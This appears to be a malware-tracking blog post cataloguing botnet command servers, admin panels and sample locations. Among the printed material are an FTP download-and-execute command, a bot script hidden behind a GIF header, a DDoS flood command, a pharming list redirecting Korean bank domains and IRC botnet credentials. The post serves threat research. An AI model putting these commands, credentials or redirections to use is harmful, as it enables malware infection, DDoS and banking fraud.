Resolved : [rageevo.sytes.net] To [190.196.122.227] PASS pass NICK raGe|PkfUmcvBta USER ofmfn “fo8.net” “rage” :ofmfn JOIN #Ev0-h4cK# ev0h4ck Now talking in #Ev0-h4cK# Topic On: [ #Ev0-h4cK# ] [ !xpl 100 1 190 -b 2 0 ] Topic By: [DJ-L0rD|Ev0| ] Modes On: [#Ev0-h4cK# ] [ +smntrul 500 ] samples here:cmd /c echo open windowsupd.serveftp.com 21 >>Read more...
70mb samples
Multiple samples from diferent sources including irc,http bots,banking trojans,rats etc have fun analysing Source
klev11.ru(G-Bot hosted in Russian Federation Moscow Mchost.ru)
Resolved : [klev11.ru] To [178.208.83.19] Panel here:hxxp://klev11.ru/g/login.php Sample here hosting infos: http://whois.domaintools.com/178.208.83.19
irc.benjol.tk(Linux bots hosted in France Roubaix Ovh Systems)
Resolved : [irc.benjol.tk] To [37.59.42.103]Resolved : [irc.benjol.tk] To [46.45.183.189] GIF89a ? ????ÿÿÿ!ù ????,???? ? ?? D ?;?<? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mail <to>Read more...
img14.poco.cn(HTTP Banking trojan hosted in China Shanghai Chinanet Shanghai Province Network)
Resolved : [img14.poco.cn] To [101.226.200.132] Resolved : [img14.poco.cn] To [101.226.200.130] Resolved : [img14.poco.cn] To [61.183.42.151] Resolved : [img14.poco.cn] To [101.226.200.134] Resolved : [img14.poco.cn] To [101.226.200.152] Resolved : [img14.poco.cn] To [61.183.42.150] Samples: hxxp://www.ccfyi.com/notepad.exe hxxp://www.ccfyi.com/mstsc.exe hxxp://www.ccfyi.com/cc.tx timg14.poco.cn GET /mypoco/myphoto/20130323/19/874940020130323195257040.jpg hxxp://174.139.56.114:54321/1.txt 1.txt: 67.198.167.37 keb.co.kr 67.198.167.37 keb.co.kr 67.198.167.37 www.keb.co.kr 67.198.167.37 www.keb.co.kr 67.198.167.37 citibank.co.kr 67.198.167.37 citibank.co.kr 67.198.167.37 www.citibank.co.kr 67.198.167.37 www.citibank.co.krRead more...
SKPHTTPBOT(http bot hosted in Croatia Zagreb Voljatel Telekomunikacije D.o.o.)
Credits to anonymous guy from here for the sample this is another hf http bot Login:176.62.0.9 He’s ddosing someone allready look here:176.62.0.9/cmds.php $CMD:flood 91.207.5.190 3389 120 15 hosting infos: http://whois.domaintools.com/176.62.0.9
priv8.blackunix.com(irc botnet hosted in United States Seattle The Endurance International Group Inc.)
Resolved : [priv8.blackunix.com] To [209.59.209.111] Server: 209.59.209.111:5545 Server Password: ownz Username: xcembmbr Nickname: priv88qPCdHIIQo The botnet spreads via ftp : cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exitRead more...
Sydnexoyex.us(Pony hosted in Germany Gunzenhausen Tt International D.o.o.)
Traffic – by URL Sydnexoyex.us/p.exe Sydnexoyex.us/4df1in1/gate.php Sydnexoyex.us/DiBU064/s.exe Sydnexoyex.us/DiBU064/st.exe j.maxmind.com/app/geoip.js euntsutviek.cm/CgUACgIOCEcKBgRGCkcZARlWAFQ5WBAlJltdOhMZCFFaGTgiHQ4cBC0ABTEKDSMhXi4kTFsvKx4ILzomWTsAOAQvBDEMPF8hBy8IJgIgUA4qHjE4GQ8OGB4ABCwnDFBYPh0bBwNfITo5CBMKWV0QGwhfJT8jJCQtE1oQAjAEACpcIh4kICwoUTEOESY9XhoqIw8/Bx0oGhANOA1YHV5YXjBdOQQoDD8sHyUAHy06HC0HXTtMWysaKF4BWVAgCycLPV4ODz4cCw4ZLTEhLyQjDlxdXiIuIVkKOExbLwITGl0dASsoClooHi8kCCAaKAsxPxEsOiUtGlgeL0xbLzgkXjMQJSA8OkxbLyw6WD0bEBwAEDM9Ox4EWicgHwMkUTkvD15RCCATODAfX10RKiswMxwnBhpRClEkE1sCLlEOBy0OXj4EDgsqJRAsJwdYIzhYUTABBVFQWS4ALQoRARkmDC8IAVEGPytRPR4xGCEKWSAhI14BXyhMWy8GK1w8MC0+BiscGSQ8ICRaUBAOGQQkBFECLloiKAwsXRgCAxsrWlk6GDgZIjorDBwrIzFZKCATWQUMXRg4A1hZKgMEHi8DPTkTLD4KHwg/LBolOlBYMwAYXQIhDgMEMExbLzwqAxBaCzoPEVseDR0IECJMWytMWysvKC04XSMRXkxbLxBZDzsDUBMCBxkaUF0rGCgmPAQlMR8wGjgsABpdXi4aEyIvMQw9Gy5RTFsvMFErWjomHzs+PVAfCz4NDV4wECgMXx1eUSoIKhpdLCpaXTEMI0xbL1o+UTEfMVsjARkMJhwBPD1RBzMqWAsCLjMvAwYYOysoHBMoURkKLwsxBSY7Xzw8LhkjUCI+KkxbKyQzWlABP1ECAVw6CwwGGjkmCisRUR0aES4MHQ8CJzsEXQEZL1oTLScFWjEBOCFdARwFAQtaLwwwLR0QDQwtKygNB1ECAwdRBzALGQ0iAF8PER8BKgUYWgcNXiY7LAAzGxoQHR8CEz8ZGyheAxAIMV89OxoAOgxYPlBREBsgTFsvMSABBFAEDgQ/MBooIg45Bz5MWys4GVhdWBwsLQMoLwcQTFsrMxAYJVkuM10mC1BbWx4kAio4G1ooPCE+IR8BACE/IAUtUBACJVw6LC4PWScdOD07URERXRwdETEsTFsvESUcICEGLFs9LAEQPT8HLBhZAVBbMF5eBlxMWysZEFkgIVAOWl4MDgInXzkcUAEMGFs7OwQIMx85HTskWCc6IiouGj0qMCUlWxw/OiIrEC8FOi4nXCYoWichPSgiECMuUAUeUBEBLQYuHlAaBUxbL18bHF0/TFsvLAgsISwTUAZYJlAFHzwsJRwfIjkiJQYjXRsYAF0bTFsrWjwuGyUjGiItGSUkHCEmKwImXz9YHC4NOF8POD8rDTpdWiolLExbKwwdWhBQMy0vEw8ZKCwhJVE8KgAuBAMuDyA+WD0RXjgZIVEaKj4gLAQGXCQqTFsrORoNAwYYEV1fC0xbLxoRDB1YK1wmWFAKMy4kOhsbPCw5P0xbK0xbK10aTFsrIwtfEV8wLh8/LSoLAl4AJxMtWTwTMywlHExbLygHAzo8Ah8CGDk5PgAAJyUuHQwqAkxaLQ== More files here hxxp://sydnexoyex.us/4df1in1/ Admin Panel:hxxp://sydnexoyex.us/4df1in1/admin.php hosting infos: http://whois.domaintools.com/176.9.208.113
us2.eclipsemc.com(Bitcoin Miner hosted in United States Kansas City Joe’s Datacenter Llc)
Mining for http://us2.eclipsemc.com:8337Using CPU (1 threads) Command Line: “C:file.exe” -o http://us2.eclipsemc.com:8337 -u m1nd_1 -p 13753216 sample here hosting infos: http://whois.domaintools.com/69.195.155.226
199.229.249.189(irc botnet hosted in United States Atlanta Colo At 55 Llc)
Remote Host Port Number 199.229.249.189 443 Local users: 131 4000 Current local users 131, max 4000 Global users: 140 4010 Current global users 140, max 4010 USER zwin- 127.0.0.1 localhost :Operation Dildos NICK zwin-WHDKCF|1837| JOIN #test : JOIN #test3 :god NICK zwin-TIGYPT|1952| Hosting infos: http://whois.domaintools.com/199.229.249.189